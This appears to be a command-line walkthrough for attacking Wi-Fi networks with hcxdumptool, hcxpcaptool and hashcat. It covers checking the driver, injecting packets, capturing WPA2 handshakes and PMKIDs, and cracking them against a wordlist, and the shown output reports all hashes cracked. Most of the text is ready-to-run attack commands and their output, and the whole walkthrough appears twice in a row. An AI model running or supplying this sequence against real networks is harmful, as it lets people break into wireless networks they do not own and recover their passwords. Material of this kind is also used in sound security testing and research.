On the first run, you need some steps to identify a suitable interface, to check driver and to check that packet injection is working. Also you must identify processes that interferes with hcxdumptool:
Identify interface:
$ hcxdumptool -I
wlan interfaces:
c83a35cb08e3 wlp3s0f0u11u1 (rt2800usb)
If you receive a warning like this:
warning: NetworkManager is running with pid 415
warning: wpa_supplicant is running with pid 515
stop this processes:
$ sudo systemctl stop NetworkManager.service
$ sudo systemctl stop wpa_supplicant.service
check driver
$ sudo hcxdumptool -i wlp3s0f0u11u1 --check_driver
starting driver test...
driver tests passed - all required ioctl() system calls are supported by driver
restoring old driver settings
check that packet injection is working (run it at least 13 * 5 seconds):
$ sudo hcxdumptool -i wlp3s0f0u11u1 --do_rcascan
INFO: cha=6, rx=351, rx(dropped)=0, tx=47, err=0, aps=21 (13 in range)
If the values increase and APs are in range, start your attack:
$ hcxdumptool -i wlp3s0f0u11u1 -o test.pcapng --enable_status=1
otherwise hcxdumptool will inform you that packet injection possible is not working as expected.
If you finished and hcxdumptool terminated, restart your processes
$ sudo systemctl start NetworkManager.service
$ sudo systemctl start wpa_supplicant.service
If hcxdumptool is not able to set monitor mode for example on this driver:
https://github.com/aircrack-ng/rtl8188eus
run ip link and iw before you start hcxdumptool:
$ sudo ip link set wlp3s0f0u11u1 down
$ sudo iw dev wlp3s0f0u11u1 set type monitor
$ sudo ip link set wlp3s0f0u11u1 up
$ sudo iw dev wlp3s0f0u11u1 info
BTW:
Most (nearly all) occurring issues are related to the driver (driver doesn't support monitor mode and full packet injection) and the system configuration (running services that take access to the interface).
The driver of your device must support both: monitor mode and full packet injection!
Otherwise hcxdumptool will fail!
Some of the issues are fixed:
https://bugzilla.kernel.org/show_bug.cgi?id=202241
https://bugzilla.kernel.org/show_bug.cgi?id=202243
https://github.com/openwrt/mt76/issues/2...-500999516
Some of them are partly fixed (or somebody is working on them):
https://github.com/aircrack-ng/rtl8812au/issues/376
Some of them are not fixed, yet:
https://bugzilla.kernel.org/show_bug.cgi?id=202541
Unfortunately many, many drivers do not support monitor mode and full packet injection. Get more information here:
https://wikidevi.com/wiki/Main_Page
For example, this driver will not support monitor mode:
https://lwn.net/Articles/786478/
Supported:
Basic STA/AP/ADHOC mode, and TDLS (STA is well tested)
so, no monitor mode on rtw88 at this point!
Last step is to convert your pcapng file using hcxpcaptool and run hashcat against the hashes:
get full advantage of hcxpcaptool (-E -I -U) in combination with hcxdumptool (attack vector PMKID, attack vector AP-LESS, attack vector EAP)
$ hcxpcaptool -o test.hccapx -E wordlist -I wordlist *.pcapng
reading from example1.pcapng
summary capture file:
file name........................: example1.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 19.10.2017 15:29:42 (GMT)
maximum time stamp...............: 19.10.2017 15:33:36 (GMT)
packets inside...................: 9
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
association requests.............: 3
EAPOL packets (total)............: 5
EAPOL packets (WPA2).............: 5
EAP packets......................: 1
found............................: EAP type ID
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M32E2...............: 1
reading from example2.pcapng
summary capture file:
file name........................: example2.pcapng
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 11.08.2019 17:57:00 (GMT)
maximum time stamp...............: 11.08.2019 17:58:03 (GMT)
packets inside...................: 10
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe requests...................: 1
association requests.............: 2
association responses............: 1
authentications (OPEN SYSTEM)....: 1
authentications (BROADCOM).......: 1
EAPOL packets (total)............: 3
EAPOL packets (WPA2).............: 3
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
reading from example3.pcapng
summary capture file:
file name........................: example3.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 26.05.2017 08:05:46 (GMT)
maximum time stamp...............: 26.05.2017 09:04:13 (GMT)
packets inside...................: 6
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe responses..................: 2
EAPOL packets (total)............: 2
EAPOL packets (WPA2).............: 2
best handshakes (total)..........: 1 (ap-less: 1)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
$ hashcat -m 2500 test.hccapx wordlist
hashcat (v5.1.0-1397-g7f4df9eb) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: test.hccapx
Time.Started.....: Mon Aug 26 15:40:07 2019 (1 sec)
Time.Estimated...: Mon Aug 26 15:40:08 2019 (0 secs)
Guess.Base.......: File (wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 613 H/s (3.05ms) @ Accel:16 Loops:512 Thr:64 Vec:1
Recovered........: 3/3 (100.00%) Digests, 3/3 (100.00%) Salts
Progress.........: 54/54 (100.00%)
Rejected.........: 0/54 (0.00%)
Restore.Point....: 0/18 (0.00%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:0-1
Identify interface:
$ hcxdumptool -I
wlan interfaces:
c83a35cb08e3 wlp3s0f0u11u1 (rt2800usb)
If you receive a warning like this:
warning: NetworkManager is running with pid 415
warning: wpa_supplicant is running with pid 515
stop this processes:
$ sudo systemctl stop NetworkManager.service
$ sudo systemctl stop wpa_supplicant.service
check driver
$ sudo hcxdumptool -i wlp3s0f0u11u1 --check_driver
starting driver test...
driver tests passed - all required ioctl() system calls are supported by driver
restoring old driver settings
check that packet injection is working (run it at least 13 * 5 seconds):
$ sudo hcxdumptool -i wlp3s0f0u11u1 --do_rcascan
INFO: cha=6, rx=351, rx(dropped)=0, tx=47, err=0, aps=21 (13 in range)
If the values increase and APs are in range, start your attack:
$ hcxdumptool -i wlp3s0f0u11u1 -o test.pcapng --enable_status=1
otherwise hcxdumptool will inform you that packet injection possible is not working as expected.
If you finished and hcxdumptool terminated, restart your processes
$ sudo systemctl start NetworkManager.service
$ sudo systemctl start wpa_supplicant.service
If hcxdumptool is not able to set monitor mode for example on this driver:
https://github.com/aircrack-ng/rtl8188eus
run ip link and iw before you start hcxdumptool:
$ sudo ip link set wlp3s0f0u11u1 down
$ sudo iw dev wlp3s0f0u11u1 set type monitor
$ sudo ip link set wlp3s0f0u11u1 up
$ sudo iw dev wlp3s0f0u11u1 info
BTW:
Most (nearly all) occurring issues are related to the driver (driver doesn't support monitor mode and full packet injection) and the system configuration (running services that take access to the interface).
The driver of your device must support both: monitor mode and full packet injection!
Otherwise hcxdumptool will fail!
Some of the issues are fixed:
https://bugzilla.kernel.org/show_bug.cgi?id=202241
https://bugzilla.kernel.org/show_bug.cgi?id=202243
https://github.com/openwrt/mt76/issues/2...-500999516
Some of them are partly fixed (or somebody is working on them):
https://github.com/aircrack-ng/rtl8812au/issues/376
Some of them are not fixed, yet:
https://bugzilla.kernel.org/show_bug.cgi?id=202541
Unfortunately many, many drivers do not support monitor mode and full packet injection. Get more information here:
https://wikidevi.com/wiki/Main_Page
For example, this driver will not support monitor mode:
https://lwn.net/Articles/786478/
Supported:
Basic STA/AP/ADHOC mode, and TDLS (STA is well tested)
so, no monitor mode on rtw88 at this point!
Last step is to convert your pcapng file using hcxpcaptool and run hashcat against the hashes:
get full advantage of hcxpcaptool (-E -I -U) in combination with hcxdumptool (attack vector PMKID, attack vector AP-LESS, attack vector EAP)
$ hcxpcaptool -o test.hccapx -E wordlist -I wordlist *.pcapng
reading from example1.pcapng
summary capture file:
file name........................: example1.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 19.10.2017 15:29:42 (GMT)
maximum time stamp...............: 19.10.2017 15:33:36 (GMT)
packets inside...................: 9
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
association requests.............: 3
EAPOL packets (total)............: 5
EAPOL packets (WPA2).............: 5
EAP packets......................: 1
found............................: EAP type ID
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M32E2...............: 1
reading from example2.pcapng
summary capture file:
file name........................: example2.pcapng
file type........................: pcapng 1.0
file hardware information........: armv6l
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 11.08.2019 17:57:00 (GMT)
maximum time stamp...............: 11.08.2019 17:58:03 (GMT)
packets inside...................: 10
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe requests...................: 1
association requests.............: 2
association responses............: 1
authentications (OPEN SYSTEM)....: 1
authentications (BROADCOM).......: 1
EAPOL packets (total)............: 3
EAPOL packets (WPA2).............: 3
best handshakes (total)..........: 1 (ap-less: 0)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
reading from example3.pcapng
summary capture file:
file name........................: example3.pcapng
file type........................: pcapng 1.0
file os information..............: Linux 4.19.65-1-ARCH
file application information.....: hcxdumptool 5.1.7
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 26.05.2017 08:05:46 (GMT)
maximum time stamp...............: 26.05.2017 09:04:13 (GMT)
packets inside...................: 6
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 0
beacons (total)..................: 2
probe responses..................: 2
EAPOL packets (total)............: 2
EAPOL packets (WPA2).............: 2
best handshakes (total)..........: 1 (ap-less: 1)
summary output file(s):
1 handshake(s) written to test.hccapx
message pair M12E2...............: 1
$ hashcat -m 2500 test.hccapx wordlist
hashcat (v5.1.0-1397-g7f4df9eb) starting...
Session..........: hashcat
Status...........: Cracked
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: test.hccapx
Time.Started.....: Mon Aug 26 15:40:07 2019 (1 sec)
Time.Estimated...: Mon Aug 26 15:40:08 2019 (0 secs)
Guess.Base.......: File (wordlist)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 613 H/s (3.05ms) @ Accel:16 Loops:512 Thr:64 Vec:1
Recovered........: 3/3 (100.00%) Digests, 3/3 (100.00%) Salts
Progress.........: 54/54 (100.00%)
Rejected.........: 0/54 (0.00%)
Restore.Point....: 0/18 (0.00%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:0-1